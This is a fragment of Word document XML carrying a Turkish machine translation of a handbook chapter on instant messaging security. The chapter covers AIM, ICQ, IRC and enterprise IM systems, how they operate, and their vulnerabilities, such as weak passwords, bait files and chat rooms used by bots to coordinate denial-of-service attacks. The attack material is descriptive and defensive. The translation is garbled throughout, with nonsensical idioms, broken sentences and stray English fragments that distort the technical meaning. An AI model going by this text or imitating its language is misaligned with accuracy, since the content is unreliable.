          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yüke duyarlı değildir. Cep telefonları birkaç dakika boyunca iyi çalıştı ancak yakında yüklemek için düştü. Yük altında en iyi sonuç veren iletişim, anlık mesajlaşma idi. “İlk yanıtlayanlar” kendilerini çağrı cihazlarını (tek yön), cep telefonlarında SMS, AOL Anında Mesajlaşma, BlackBerrys ve diğer anlık mesajlaşma yöntemlerini kullanarak buldu.</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 xml:space="preserve">Klişe kullanma riski altında olan IM yeni bir paradigmadır. Dünyayı görme şeklimizi değiştiriyor ve sonunda dünyayı değiştirecek. IM, işyerini e-postadan önceki gibi değiştiriyor. (Evet, e-posta işyerini değiştirdi. Hepimiz farkedecek kadar uzun süre bulunmamasına rağmen, her zaman olduğu gibi olmadı.) Dün meslektaşım Roger ile “sohbet ediyordum”. PDA'larımıza kurduğumuz yeni bir IM istemcisinden bahsediyorduk. (İkimiz de Handspring Treo iletişimcilerini, Palm OS PDA ile entegre cep telefonlarını kullanıyoruz.) “IM, PDA'ların katil uygulamasıdır” dedi. Şaşırdım. Ona bu bölümde çalıştığımı söyledim ve detaylandırmasını istedim. Şimdi esas olarak evden ve yoldan çalışanlar için (hem bizleri hem de meslektaşlarımızın çoğunu içeren) IM'nin şimdi sanal su soğutucumuz olduğunu söylemeye devam etti. O işi yaptığımız yer, salonlarda yürürken ya da kafeteryada buluşarak yapardık. Aynı zamanda, konuşmanın uygun bir zaman olup olmadığını görmek için kapı eşiğimiz. Telefonda bir meslektaşı aramayı planlasa bile, ilk önce bir anlık mesaj gönderir. IM, bir PDA ile yaptığımız diğer spontan şeyleri tamamlar. Aşağıdaki tartışmada IM'in bir </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>donanım ağı üzerine kurulu bir insan ağı olduğunu göreceksiniz. Sunucular ve protokoller yerine getirildiğinde, yetenekleri ve diğer iletişim yöntemleriyle entegrasyonu yalnızca yazılım istemcilerinin karmaşıklığı ile sınırlıdır. IM, kendiliğinden bir işbirliği aracıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000421DE"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Açıklama   Bu bölüm anlık mesajlaşmayı (IM) açıklarken, sonraki bölümlerde açıklayıcı sistemler ve tipik işlemler tartışılarak ayrıntılı bilgi verilmektedir. En soyut haliyle IM, kullanıcıların kısa sürede gerçek zamanlı olarak iletişim kurduğu bir istemci / sunucu uygulamasıdır. İstemci giriş ve çıkış gerçekleştirir, İnternet ulaşım ve bağlantı sağlarken, sunucular mesaj adresleme ve isteğe bağlı olarak mesaj yönlendirme sağlar. IM’in en popüler örneklemesi AOL Anında Mesajlaşma (AIM). AOL istemcisine yerleşik bir AIM istemcisi var. Diğer uygulamalara ve uygulama paketlerine yerleşik AIM istemcileri de vardır. Sohbet kullanıcıları, masaüstünde veya istemci uygulamasında adlandırılmış pencereler olarak temsil edilir. Bir pencereyle temsil edilen kullanıcıya mesaj göndermek için, bir kişi imleci pencereye yerleştirir (aktif pencere yapar) ve mesaja yazar. Bu mesaj daha sonra, eşzamanlı olarak, eşzamanlı olarak, bağlantının diğer ucunu temsil eden başka birinin sistemindeki pencerede görünür. En basit haliyle trafic  bire bir.   Ancak, bir var  grup modu   A, bir topluluk grubunun üyelerine katılmak için bir davetiye gönderdi.  Bire birçok   veya   çoktan çoğa modu.  “Sohbet odası” nın kurulduğu ikinci bir çoktan fazla modu var. Sanal oda bir gruba, bir konuya veya bir tartışmaya tahsis edilebilir. Katılımcılar  oda   - yani, tartışma - irade. Odaya katılanlar isim etiketleri veya simgeler ile temsil edilebilir. Teoride, IM eşzamanlıdır: yani, A'dan B'ye bir mesaj, ardından B'den A'ya bir cevap gelir. Uygulamada, daha "eşzamanlıya yakındır" dır; iki veya daha fazla eşzamanlı ipliğin düzensiz olması. IM nispeten açık bir uygulamadır. Ağlar, sunucular, odalar veya gruplar, adlandırılmış ve belirlenmiş katılımcılar dışındaki herkese kapalı olabilirken, çoğu tüm katılımcılara açıktır. Altyapı (yani, müşteriler, sunucular ve bağlantılar) herkese açıktır. IM ayrıca nispeten birlikte çalışabilir. Çoğu ağ ve sunucu birincil olarak eşleriyle birlikte çalışsa da, birçok farklı istemci başkalarıyla birlikte çalışabilir ve çoğu müşteri birden çok ağ ve sunucu ile çalışacaktır. Cerulean Studios'un Trillian Professional istemcisi, AOL, MS, Yahoo, ICQ ve çoklu IRC ağları üzerinden eşzamanlı bağlantıları destekleyecektir. Hem AIM hem de ICQ işletmecisi olan Time Warner, ikisinin birlikte çalışmasına izin vermeyi planladığını açıkladı. IM sistemleri yalnızca birbirleriyle değil, e-posta ve sesli postayla da çalışır.</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sistemler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  b</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u bölüm daha önemli IM sistemlerinden bazılarını tanımlamakta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AOL I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En popüler tüketici IM sistemi uzak ve uzak AOL IM'dir (AIM). Kayıtlı kullanıcı veya trafik sayısı ile ölçülür, başka bir sistem yaklaşmaz. AOL, bir IM sisteminin değerinin düzenli kullanıcı sayısı ile geometrik olarak arttığının farkındadır. IM, AOL istemcisine eklenmiş ve başlangıçta AOL’nin arama yapan müşterileri için tasarlanmasına rağmen, İnternet’i tüm gelenlere açık olduğu yerlerde kullanır. AOL müşterisi olan veya olmayan herkes, AIM sunucusuna bir ad kaydedebilir. AOL’un yazılım iştiraki Netscape’den bir tanesi de dahil olmak üzere bir dizi bağımsız müşteri kullanılabilir. AOL, ISS'leri (İnternet servis sağlayıcıları) ve diğer servisleri bir AOL istemcisini tekliflerine dahil etmeye teşvik ed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CQ</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Time Warner aynı zamanda İnternet CQ (ICQ) operatörüdür. Amatör radyo operatörleri modeli tanıyacaktır. AOL IM telefon gibi olsa da, ICQ daha çok bir jambon kanalı gibi. Konferans görüşmesi yapmak mümkün olsa da, telefon öncelikle bire birdir. Bir bire bir modda bir jambon radyo kullanmak mümkün olsa da, esasen çoktan çoğa bir ortamdı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RC</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azı İnternet tarihçileri, 1996 yılında ICQ'dan IM ile çıkarken, çoğu, 1988'de ortaya çıkan Internet Relay Chat'i (IRC), tüm anlık mesajlaşmaların büyükbabası olarak tanıyor. IRC (UNIX’den UNIX’e) için bir alternatif ve detaylandırma olarak inşa edild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onuş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omut. IRC sunucuları genellikle UNIX sistemlerinde çalışırken, istemciler Wintel sistemleri, IBM VM, EMACS, Macintosh, NeXTStep, VMS ve diğerleri için kullanılabilir. Erken IRC istemcileri komut satırı ile yönlendirildi ve yönlendirildi. Birçok temizlikçi hala bu modda kullanmayı tercih ediyor. Ancak, modern istemciler grafiksel bir kullanıcı arayüzü kullanır. Örneğin, BitchX, UNIX / X-Windows sistemleri için bir GUI istemcisidir. ICQ gibi, IRC de temelde çoktan çoğadır. Bir kullanıcı başka bir kullanıcıya kullanıcı adıyla değil, bir kanal adına referansla bir kanala bağlanır. Gerçekten de, IRC kullanıcıları kendi adlarına bile sahip değiller. Bir kullanıcının bir kanal içindeki girişi, yalnızca kullanıcı kanala bağlı kaldığı sürece iyi olan isteğe bağlı bir takma adla tanımlanır. Bir kullanıcının bir takma adı yoktur. Takma ad geçerli kullanımda olmadığı sürece, herkes kullanabilir. Böylece, IRC çoğu IM sisteminden bile daha adsızdır. (IRC takma adlarının bir kaydı vardı, nickserv, ancak kullanımı isteğe bağlıydı. Bir kullanıcının takma adını kaydetmesine gerek yoktu; kanallar kayıt defterini kontrol etmedi. Böyle bir gönüllü kayıt defteri, nickserv'in ilkbahardan bu yana çok az bir değeri vardı. 1994 ve hiç kimse bir ikame kurmak istemedi.) IRC için Web tabanlı istemciler de var. Web posta sunucuları gibi, bunlar iki katmanlı istemciyi / sunucuları üç katmanlı hale getiren sunuculardır. Gerçek IRC istemcisi bir sunucu üzerinde çalışır ve daha sonra bir WWW istemcisi (yani bir tarayıcı) tarafından erişilir. Bu, bir kullanıcının ICQ istemcisine kendi sisteminde sahip olması gerekmediği, ancak IRC'ye daha fazla yerden erişebileceği ve “ağda” açıkça görüneceği anlamına geli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Lotus Sametime Bağlantısı  Lotus Sametime Connect sistemi kurumsal IM için sunulur ve mevcut bir kurumsal dizinin (Notes sunucusu) kullanılması ve anahtar yönetimi ile uçtan uca şifreleme (Lotus Notes genel anahtar altyapısına dayanan) gibi özellikler sunar. Metne ek olarak, Sametime sesi ve görüntüyü destekler.   NetMeeting  NetMeeting (NM), tam fonksiyonlu bir işbirliği istemcisidir. NM, adresleri çözmek için dizinleri kullanırken, genellikle tek bir ağ adres alanında (veya bir proxy üzerinden adres alanlarında) eşler arası çalışır. Sohbete ek olarak, NM sesli sohbeti, hareketli görüntüyü, beyaz tahtayı (grafiksel sohbeti düşün), dosya aktarımını, uygulama paylaşımını ve hatta masaüstü paylaşımını destekler.   AU1997_Frame_Ch050 Sayfa 603 17 Kasım 2003 Pazartesi 13:20 © 2004, CRC Press LLC tarafından   604   Bilgi Güvenliği Yönetimi El Kitabı   Yahoo!  Yahoo! Mesajlaşma web tabanlı, tüketici odaklı ve halka açıktır. Hem kullanıcıdan kullanıcıya mesajlar hem de sohbet odalarını destekler. Bir kullanıcı kaydı var ancak ortak kullanıcı rehberi yok; ve büyük bir sohbet odası rehberi var.   MS Windows Messenger  Windows Messenger, IM'nin MS Windows işletim sistemine entegre edilmesidir. Kullanıcıları e-posta adresleri altında kaydetmek için .Net Passport sunucusunu veya kullanıcı adlarını kaydetmek için yerel bir dizini kullanır. NetMeeting'in özelliklerinin çoğu (örneğin, gönderme ve alma, ses, video, beyaz tahta, uygulama paylaşımı ve masaüstü paylaşımı) Messenger istemci işlevine eklenmiştir.   Diğerleri  Ek IM sistemleri, Jabber (kurumsal IM), businessim, Akonix </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(kamuya açık IM'in kurumsal kullanımı için bir ağ geçidi), 12 gezegen (kurumsal sohbet sunucusu), e / pop (kurumsal) ve GTV'yi (genel ağ geçidi ile kurumsal IM) içeri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Operasyo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u bölümde tipik IM işlemleri açıklanmakta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stemciyi Kurma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Çoğu kullanıcı için bu gerekli bir adımdır ve genellikle bir simgeye tıklamak ve bir veya iki istemde yanıt vermek kadar basittir. Çoğu IM istemcisi, kullanıcının zaten sahip olduğu başka bir işletim sistemine veya uygulamaya dahil edilir. Ancak, İnternet'te tercih edilen müşteriyi bulmak ve bir kopyasını indirmek zorunda kalabilir. Biri AOL veya MSN kullanıcısıysa, IM bu istemcilerde istemcilere dahil edilir. (Bazen sorun bunlardan birinden kurtulmaktır.) Kullanıcıdan yükleme sırasında bir veya iki genel seçenek belirlemesi isten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stemciyi Başlat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stemciyi başlatmak genellikle bir simgeye tıklamak kadar basittir. IM istemcileri genellikle başlangıç ​​listesindedir ve çoğu, kurulum sırasında kendilerini oraya koymayı den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aydol</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çok sistemde, yeni kullanıcılar, kullanıcı kimliklerini, "ekran adlarını", tanıtıcıları veya diğer adlarını kaydetmelidir. Tüketici sistemlerinde, bu, istemci programından bir iki isteme yanıt vermek kadar basit olabilir. Kurumsal sistemlerde, zaten çalışan veya kullanıcı dizininde bulunanlar için otomatik olabilir, ancak form doldurup imzalamayı ve olmayanlar için yönetim onayı almayı içer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işi Listelerini Doldur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azen gerekli ve daima yararlı bir adım, bir kişinin kişisini veya arkadaş listesini doldurmaktır. Bu genellikle kişinin kullanıcı adını girmek kadar basittir. İsteğe bağlı olarak, kullanıcılar gruplar halinde düzenlenebilir. Çoğu müşteri, kullanıcı adlarını kayıt defterine göre kontrol eder ve kayıt defterinin tanımadığı adları bildir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ağ</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stemciyi servise bağlamak genellikle yazılımı başlatmak kadar kolaydır. Sistem başlangıcında otomatik bile olabilir. İstemci ve sunucu birbirine IP adresi ve port numarası gibi bakıyor. Çoğu tüketici ve kurumsal sistem için, bu bilgi istemci yazılımına yerleştirilmiştir ve kullanıcı tarafından görülemez veya anlamsız değildir. IRC ağları veya çoklu ağ istemcileri için bir IP adresi tanımlamayı ve girmeyi içer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Log-o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Sohbet servisleri, kullanıcının tanıtıcısıyla oturum açmasını gerektirebilir. İstemci uygulamaları genellikle bu değeri hatırlar; böylece açılır listeden seçilebilir veya varsayılan olarak girilebilir. Çoğu IM servisi de bir şifre bekler. Yine, müşteriler genellikle parolaları hatırlama ve bunları otomatik olarak girme özelliğini içerir. Güvenlik uygulaması açık olmalıdır. Sohbet servislerinde oturum açmak olağandışı bir şekilde kalıcıdır; çoğu sistemde zaman aşımı olmaz. weemanjr (a.k.a. Tigerbait, Gatorbait veya Bitesize) yakın zamanda beni ziyaret etti. AOL IM'de oturum açmak için dizüstü bilgisayarımı ve istemci yazılımımı kullandı. Aslında, o sık sık yaptı ki, varsayılan ekran adını weemanjr olarak ayarladı, şifresini </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sakladı ve müşteriyi otomatik olarak oturum açması için ayarladı. Onun parolasını göremesem de, bundan çok faydalanıyorum. Weemanjr'ın daha düşman bir yerden bağlanmış olabileceğini unutmayı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letişim Listele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Çoğu istemci uygulaması, rastgele sayıda kişi veya muhabirin adını saklama ve bunları klasörler halinde düzenleme yeteneğine sahiptir. Bir kullanıcının muhabirlerinin isimlerine, bir kişi listesi veya “arkadaş listesi” adı verilir. Bir kurumsal IM sistemi, Lotus Sametime Connect, iki ayrı kişi listesi sağlar: biri Lotus Notes dizin sunucusuna dayalı, biri de dışarıdakiler için. AOL IM sunucusunda kayıtlı. Oturum açma zamanında, kişi listesi istemci uygulamasına geri yüklenir. İstemci tarafında veya sunucu tarafında saklanmış olabilir. Diğer şeyler eşittir, müşteri tarafı açıklamaya karşı daha dirençlidir ancak sunucu tarafında depolandığı kadar çok yerden temin edilemez. Kişi listesi geri yüklendikten sonra, sunucuya ve istemci uygulaması kişi listesi penceresinde görüntülenen her bir kişinin durumuna karşı çalıştırılabilir. Ayrıca Weemanjr’ın arkadaş listesini de kullandım. İki klasörü var: “arkadaşlar” ve “kızlar”. Arkadaşların kolları onların erkek kaykay arkadaşları veya oyun arkadaşı olduğu anlamına gelir. Kızların kulpları, kendilerini tanımlayan (kendi kimlikleriyle) belirlenmiş, kendilerini değiştiren ve dedikodu yapan, weemanjr'ın kızlarının temel etkinlikleri olduklarını öne sürüyorlar. Gençler, genellikle ortak ve tanımlayıcı isimleri nitelemek için doğum tarihlerini kullanırlar. Bu nedenle, bu arkadaş listesi sadece partinin cinsiyeti hakkında değil aynı zamanda yaşı hakkında da bilgi sızdırıyor. Bu bilgi, Weemanjr'ın kodu bilmeyen veya onu ilgilendirmek için çok yaşlı olan muhabirleri olabileceğini göstermekte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Mesaj gönder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 kişi bir kişinin adını veya simgesini tıkladığında, istemci uygulaması kişiyle bağlantı kurmayı dener; Girişim başarılı olursa, göndericiyle ilişkili bir uygulama penceresi alıcının sisteminde açılır. İstemci uygulaması, tanımlayıcı ve durum bilgisini pencereye koyacaktır. Bu bilgiler, alıcının adını, çevrimiçi / ine, son etkinlikten bu yana geçen zamanı ve isteğe bağlı olarak müşterisinin yeteneklerini (örneğin ses, görüntü, simge gösterme, gönderme / alma) içerebilir. Biri () penceresinin alt yarısına bir mesaj yazabilir; Yeni hat / dönüş tuşlandığında, mesaj gönderilir. Tüm mesajlar gönderenin adı ile belirlenen pencerenin üst yarısında görüntülen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rup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i birden fazla alıcıyı davet etmeye davet ed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eçic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rubudur. Katılan tüm istemci uygulamalarında bir pencere açılacaktır. Gruptaki tüm katılımcılar arasındaki trafik, tüm pencerelerde ilgili pencerede görünecektir. Her mesaj gönderenin adı ile etiketlenecektir. Son kullanıcı bıraktığında grup kaybolu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anallar ve Oda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anallar ve odalar, genellikle bir konuyla veya konuyla ilişkilendirilen kalıcı tartışmalardır. Kullanıcılar bir kanala veya bir odaya istedikleri zaman katılabilir, tüm trafiği görebilir, mesaj gönderebilir ve istek üzerine bırakabilir. Traf the c gönderenin adı ile etiketlenebilir. Uygulamaya bağlı olarak, pencere kanala veya odaya bağlı olanların tutamaçlarını gösterebilir veya göstermeyebilir; farkedilmemiş “lurkerler” olabilir. Kanallar, odalar ve bunların trafiği, son kullanıcı bağlantısının kesilmesinden sonra bile devam ed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osya Gönderme ve Al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İstemci uygulamasında yer alan işlevselliğe bağlı olarak, bağlantılar, e-posta adresleri, “ifadeler” (örneğin gülen yüz) veya diğer (isteğe bağlı) nesneler bir bağlantı penceresine </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>"sürüklenip bırakılabilir". Eğer ve bunların nasıl alıcının sistemde görünen alıcının uygulamanın bir fonksiyonudur. Gönderici, bir nesnenin etiketini veya simgesini (örneğin, program veya veri dosyası) başka bir kullanıcıya bir IM bağlantısını temsil eden pencereye sürükler. Alıcının sisteminde, kartı almak isteyip istemediğini soran bir pencere açılacaktır. Eğer öyleyse, kendisine depolanacağı yer (örneğin, klasör veya dizin) ve kendisine atanacak isim sorulur. IMemanın kendisine gönderilen bir dosyayı kabul ederek Weemanjr'ın sistemimi kolayca bir virüsle kirletmiş olabileceğini düşünün.</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Uygulama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M'in en genel uygulaması b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onuş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ki veya daha fazla insan arasında. Çocuklar için bu konuşma şekli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osyalleş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 Yetişkinler için olabilir. Konular güncel olayları, sporları, sorguları, dedikoduları vb. İçerir. Müşteriye verilen desteğe bağlı olarak, diğer birçok uygulama IM'de “geridönüşlü” olabilir (içinde kapsüllenebilir). Örneğin, birçok müşteri dosya aktarımını destekler. Benzer şekilde, müşteri seslerin, seslerin, görüntülerin, hareketli görüntülerin, diğer keyfi nesnelerin, uygulamaların ve hatta tüm sistemin kontrolünün geçişini destekleyebilir. En gelişmiş IM istemcisi MS NetMeeting, bunların hepsini aynı anda destekliyor. (NetMeeting kendi başına bir sınıfa girmiştir. Diğer IM istemcilerinden çok daha karmaşıktır; genellikle sınıfın bir üyesi olarak tanınmaz.) Sunucunun rolü ileti iletme ve adresleme olduğundan, işlevsellikte değişiklik olmamalıdır. Sunucunun bu karmaşıklık seviyesine ulaşması gerekebilir. Benim içi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müşteri ve kullanıcı desteğ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çok iş stratejisinin önemli bir parçası haline gelmiştir. Telefon desteği personeli, müşterileri veya aboneleri ile konuşurken yardım almak için onu “geri kanal” olarak da kullanır. Danışmanlık, tasarım ve programlama ekipleri IM kullanıyor işbirliğ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epsi aynı masada otururken bile. Üretkenliğe o kadar çok şey katıyor ki, çoğumuz onsuz çalışmayı reddediyor. Şirkette, IM genel adresi, ilan tahtalarını ve e-postaları tamam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uyuru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Özellikle virüs uyarıları veya zamanında olmanın zorunlu olduğu hava durumu gibi bildirimler için kullanışlıdır. Son olarak, IM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edikodu,</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Çoğu kurumun direndiği ancak yine de etkinlikleri için gerekli olabilecek alternatif iletişim kanal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Yetenekle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Bazı sunucular ve istemciler basit adresleme ve iletme dışındaki işlemleri yürütme özelliğini destekler. Bu özellik, uygulamanın kolay işlevsel uzantısını desteklemek, yani yeni yazılımı tanıtmayı kolaylaştırmak için mevcuttur. Bir IRC istemcisi (Bitchx), daha önceki bir istemciye karmaşık bir komut dosyası aracılığıyla eklenen işlevlerin birleştirilmesinden kaynaklandı. Bu eklenen programlar tamamen keyfi olabilir. Yeterli ayrıcalığı veya özel bilgileri olan herkes tarafından yazılabilir ve örneklendirilebilir. Bu özelliğe sahip sunucular, internete bağlı genel amaçlı bilgi işlem motorları olarak görülebilir. Çoğu, saldırı motorları olarak kirlenmelerini veya kullanılmalarını önlemek için güvenlik kontrollerine (örneğin kilit kelimeler veya parolalar) sahiptir. Ancak, bu sömürülebilecek birçok şey bırakıyor. Bir veya daha fazla botun, aksi takdirde daha güvenli botların kontrollerine karşı kapsamlı saldırılar yapmak için kullanıldığı “bot savaşları” gördük. Hileli bilgisayar korsanları, saldırıların kaynağını gizlemek için IM sunucularını kullanır. Bir senaryoda, tehlike altındaki sistemler bir sohbet odasına bağlanır ve bir mesaj bekler. Bu haydut hacker daha sonra o odaya bağlanır </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ve onu kapsamlı ve hizmet reddi saldırısının zamanını ve hedefini içeren bir mesaj göndermek için kullanır. Başka bir yolla, kanal veya oda tüm dinleme ve saldırma sistemlerini koordine etmek için kullanılı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imge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çok istemci uygulaması, bir kullanıcının başka bir kullanıcıya, gönderen kullanıcının penceresindeki alıcı penceresini tanımlamak için bir simge göndermesini sağlar. Bu görüntüler rahatsız edici olabileceğinden, bu uygulamaların çoğu, çirkin bir sürprizden kaçınmak için bir seferde birkaç bit gösterme bile olsa, simgenin dahil edilmesini kontrol etme özelliğini de içer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M'in güvenlik açıklarının kimseyi şaşırtması muhtemel değildir. Bunlar, İnternet’in diğer bölümlerinde gördüğümüz güvenlik açıkları. Bununla birlikte, gerekli olmadığında bunları numaralandırmak faydalıdır. Aynı temel sınıflara giriyor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Temel Güvenlik Açık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Temel güvenlik açıkları, çevreye veya uygulamaya özgü olanlardır. Herhangi bir eylem veya eylemsizlikten kaynaklanmazlar; onlar sadece. Bunun için tazmin edilebilirler ancak ortadan kaldırılamazlar. IM'in en büyük temel güvenlik açığı açık olmasıdır. Hizmetlere açıktır; herkes bir tane koyabilir. Ağlar sunuculara açıktır; Varsayılan olarak, herkes bir tane ekleyebilir. IM kullanıcılara açıktır; Yine, varsayılan olarak, herkes bir servise kaydolabilir. Bu, ağın girişime veya kirlenmeye karşı savunmasız olmasını ve trafiğin sızıntıya karşı savunmasız olmasını sağlar. Kapalı IM popülasyonları veya ağları oluşturmak mümkün olsa da, bu kapalı popülasyonlar ve ağlar açık olanlardan önemli ölçüde daha az faydalıdır. Ayrıca, birçok istemci uygulaması, kullanıcıların ve istemcilerin, aksi takdirde ayrık olmayan iki ağ arasında bağlantılar oluşturmasını kolaylaştırır. Kullanıcı anonimliği, ikinci bir temel güvenlik açığıdır. Tanıtıcılarda veya diğer adların kullanılması IM'de standarttır. Bu takma adlar ile benzersiz bir kimlik arasındaki bağın gücü, sahte olandan hatalı olanı lokalize etmek için yeteri kadar ama kötüyü etkili bir şekilde gizlemek için yeterince gevşektir. Bu, kullanıcının sorumluluğunu önemli ölçüde azaltır ve bazı durumlarda sorumlu tarafların kimliğini başarıyla gizlemek için kullanılabilir. Kötülüğü davet ediyor gibi görünüyor. Herhangi bir veri gizleme, gönderici ile alıcı arasında önceden ayarlamalar içerdiğinden, IM'deki çoğu trafik net bir şekilde hareket eder. Bu ağda sızıntı olabileceği anlamına gelir. Bu, trafiğin çoğunun önemsiz olduğu gerçeğiyle dengelense de, genel olarak IM'nin kurumsal uygulamalar için uygun olmayabileceği anlamına gelir. Dahası, IM kullanımı o kadar rahat ve kendiliğinden ki, kullanıcılar önemsiz trafik ile hassas trafik arasındaki çizgiyi bile fark etmeden geçiyorla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Uygulamaya Bağlı Güvenlik Açık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Uygulamaya bağlı güvenlik açıklarının mevcut olması gerekmez. Bunlar eylemciler, ihmaller veya uygulayıcıların seçimleriyle ortaya çıkar. Çoğu hata veya gözetim sonucu ortaya çıkar. IM'deki uygulama kaynaklı güvenlik açıklarının çoğu kendisine özgü değildir. İnternetin geri kalanıyla paylaşılıyorlar. Bunlar, genellikle kanıtları ile belirlenmeyen düşük kaliteli yazılımları içerir. İnternetteki çoğu yazılım gibi, bu yazılı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irişini kontrol etmez veya kontrol etme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ve bu girdiden kaynaklanan kirlenmelere karşı savunmasızdır (aşırı akma korkunç tampon). İnternetteki çoğu yazılım gib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açış mekanizma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lginin uygulamadan ve kontrollerinden kaçmasını sağlayan. Birçok sunucuya karşı savunması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lastRenderedPageBreak/>
        <w:t> diğer uygulamalardan gelen girişi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ynı donanım veya yazılım ortamında çalışan. Bu yazılımın çoğu kullan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ant içi kontrol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azı servislerde, kullanıcı verileri (örneğin, arkadaş listeleri ve dizin girişleri) sunucularda depolanır. Bu meşru bir tasarım seçimidir; Uygulamayı daha taşınabilir hale getirir. Örneğin, birinin arkadaş listesini bir kişinin (kablosuz) PDA'sından veya bir havaalanı ya da kahve dükkanı kulübesinden kullanabilirsiniz. Ancak, milyonlarca küçük hedefi iki veya üç büyük hedefle değiştiriyor. Bu sunuculara yapılan başarılı bir saldırının sonuçlarını ortaya koyuyor. Böyle başarılı bir saldırı, büyük miktarda veri gizliliğinin tehlikeye girmesine neden olur. Bu verilerden bazıları açıklamaya duyarlı olabilir. Örneğin, irtibat listeleri kişisel dernekler hakkında bilgi içerir; Rehber kayıtları, kişisel çıkarlar hakkında, zorunlu olarak söylenmeyecek bilgileri içerebilir. Bir dereceye kadar, kullanıcılar bu bilgilerin hassasiyetini düşünmemişlerdir. Bir dereceye kadar bu bağlamda paylaşmaya isteklidirler. Çoğu durumda hiçbir şey umursamıyor. Ancak, bazıları internette yayınlanmak istemez.</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Operatörün Neden Olduğu Güvenlik Açık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erhangi bir şey için IM'ye güvendiğimiz ölçüde, sunucuların operatörlerine güveniriz. Bazı durumlarda, belki de çoğu durumda, operatörlerle anlaşmamız var. Bu anlaşmalar, hizmet için hizmet şartlarını içerir; Bu TOS çoğunlukla kullanıcıyı bağlar. Genel olarak, operatörler “en iyi çabaları” vaat ediyorlar, ancak herhangi bir şey için onlara güvenebileceğimiz ölçüde, TOS'un vaatlerine güvenebiliriz. Bununla birlikte, bazı hizmetler (örneğin, IRC) doğada işbirliği içindedir. Bakabileceğimiz tek bir sağlayıcı yok. Ağ, içindeki en zayıf sunucudan daha güçlü olmaya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ullanıcının Neden Olduğu Güvenlik Açık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enzer şekilde, kullanıcıların güvenlik açıkları sağlamak için yaptıkları şeyleri bilmeniz gerek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Zayıf Şifre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M şifreleri botlarda saldırıya (sunucularda) rağmen, çoğu istemci uygulaması güçlü şifre kuralları uygulamamaktadır. Varsayılan olarak, çoğu IM uygulaması kullanıcının kullanıcının şifresini saklamasına ve otomatik olarak göndermesine izin verir. Ve çoğu müşteri otomatik olarak uzun parolalar girecek olsa da, kullanıcılar hala kısa olanları tercih ediyo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Varsayılan Ayarların Kullanım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ullanıcılar varsayılan ayarları tercih eder; Kurulumu kolaylaştırır ve bir ürünün kullanımıyla ilgili özel bilgileri içerir. Mesaj alma gibi olaylar için, istemci uygulamaları varsayılan olarak "sormak" gibi görünmektedir. Örneğin, kullanıcı bir mesaj alıp almayacağını belirtmezse, Trillian istemcisi soracaktır. Ancak, diğer seçimler için sormayabilir. Varsayılan ayar, Enter tuşuna basıldığında mesajı göndermektir. Bu, mesajın incelenmeden önce yanlışlıkla gönderilmesine neden olabilir. Bir daha güvenli bir seçenek olduğunu bile anlamadı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Yem Nesnelerini Kabul Etme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Kullanıcılar, yem nesnelerini kabul ederek sistemlerini ve kurumsal ağlarını her zaman tehlikeye atabilirler. Saldırganın bakış açısından, her şey başarısız olduğunda, kullanıcı davranışlarından yararlanıldığı söylenir. Görüldüğü gibi, IM isteğe bağlı nesneleri içerecek şekilde salt metin olmaktan büyüdü. Bir kullanıcıyı tehlikeye atmak için gereken tek şey, direnmediği bir yem bulmak. Bireyler için yem kendi çıkarları bilgisinden yararlanabilir. Sohbet odalarında balık tutmak, yeterince büyük bir partide, bazı insanların ıslak patates cipsi </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
